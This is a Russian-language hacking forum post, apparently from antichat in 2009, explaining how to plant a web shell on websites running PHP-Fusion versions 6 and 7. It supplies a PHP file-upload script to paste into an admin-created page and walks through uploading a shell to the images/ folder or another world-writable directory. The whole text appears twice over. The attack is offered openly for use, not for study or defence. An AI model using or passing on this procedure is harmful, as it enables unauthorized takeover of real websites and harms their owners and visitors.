SuNDowN
12.12.2009, 14:38
Привет АчаТу! 5 дней искал способ заливки шелла на сайт с двигом PHP Fusion (версии от 6.**.** до 7.**.**) и нашёл!
• Итак что нам надо?
- Нам нужны админские права (Админа/Супер Админа);
- И вот мой скриптик вам пригодится:
<?php
$uploaddir = 'images/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is Valid, and was Successfully Uploaded! ;)\n";
} else {
echo "File Uploading Failed! ;(\n";
}
?>
<form name="upload" action="viewpage.php?page_id=" method="POST" ENCTYPE="multipart/form-data">
Select the file to upload: <input type="file" name="userfile">
<input type="submit" name="upload" value="UpLoad">
</form>
• Что дальше?
- Заходим на сайт куда нада залить шелл, вводим логин/пароль админа;
- Далее щёлкаем "Панель администратора" в появившемся окне щёлкаем "Страницы";
- Далее мы временно создаем страницу, придумайте название, а вот в форму содержания вставьте код который я показал и нажимаем "Сохранить Страницу";
- После сохранения вам выдаст такое: "Страница добавлена. Ссылка на эту страницу: viewpage.php?page_id=XXX", где XXX - номер страницы.
- Далее находим нашу страницу под названием которым мы её сохранили, нажимаем "Изменить" и в коде в строке "viewpage.php?page_id=XXX" заменяем XXX на те цифры которые нам показало первый раз при сохранении нашей страницы;
- Далее щёлкаем по выданной ссылке нашей страницы;
- Щёлкаем кнопку "Обзор" указываем путь до шелла и жмём кнопку "UpLoad".
- После нажатия на "UpLoad" если выдаст сообщение:
\ "File Uploading Failed! ;(" - значит не удалось залить шелл, тут либо прав нет на запись на сайт, либо вы чтото сделали не так!)
\ "File is Valid, and was Successfully Uploaded! ;)" - это значит заливка удалась и мы идёт открывать шелл! Шелл будет располагаться по следующему пути:
http://site.com/images/Имя_Вашего_Шелла.php
- Если вы знаете другую папку на которой в большенстве случаев CHMOD 777 тогда вы можете изменить путь по умолчанию на неё, для этого вам нужно в моём коде изменить строку на свою папку:
$uploaddir = 'images/';• Если Вам помог мой способ помогите и мне! Поставь + -сы не желей! =)
Author: © SuNDowN (http://forum.antichat.ru/thread131580.html) - Просить плюсы нельзя (c) Ctacok
• Итак что нам надо?
- Нам нужны админские права (Админа/Супер Админа);
- И вот мой скриптик вам пригодится:
<?php
$uploaddir = 'images/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is Valid, and was Successfully Uploaded! ;)\n";
} else {
echo "File Uploading Failed! ;(\n";
}
?>
<form name="upload" action="viewpage.php?page_id=" method="POST" ENCTYPE="multipart/form-data">
Select the file to upload: <input type="file" name="userfile">
<input type="submit" name="upload" value="UpLoad">
</form>
• Что дальше?
- Заходим на сайт куда нада залить шелл, вводим логин/пароль админа;
- Далее щёлкаем "Панель администратора" в появившемся окне щёлкаем "Страницы";
- Далее мы временно создаем страницу, придумайте название, а вот в форму содержания вставьте код который я показал и нажимаем "Сохранить Страницу";
- После сохранения вам выдаст такое: "Страница добавлена. Ссылка на эту страницу: viewpage.php?page_id=XXX", где XXX - номер страницы.
- Далее находим нашу страницу под названием которым мы её сохранили, нажимаем "Изменить" и в коде в строке "viewpage.php?page_id=XXX" заменяем XXX на те цифры которые нам показало первый раз при сохранении нашей страницы;
- Далее щёлкаем по выданной ссылке нашей страницы;
- Щёлкаем кнопку "Обзор" указываем путь до шелла и жмём кнопку "UpLoad".
- После нажатия на "UpLoad" если выдаст сообщение:
\ "File Uploading Failed! ;(" - значит не удалось залить шелл, тут либо прав нет на запись на сайт, либо вы чтото сделали не так!)
\ "File is Valid, and was Successfully Uploaded! ;)" - это значит заливка удалась и мы идёт открывать шелл! Шелл будет располагаться по следующему пути:
http://site.com/images/Имя_Вашего_Шелла.php
- Если вы знаете другую папку на которой в большенстве случаев CHMOD 777 тогда вы можете изменить путь по умолчанию на неё, для этого вам нужно в моём коде изменить строку на свою папку:
$uploaddir = 'images/';• Если Вам помог мой способ помогите и мне! Поставь + -сы не желей! =)
Author: © SuNDowN (http://forum.antichat.ru/thread131580.html) - Просить плюсы нельзя (c) Ctacok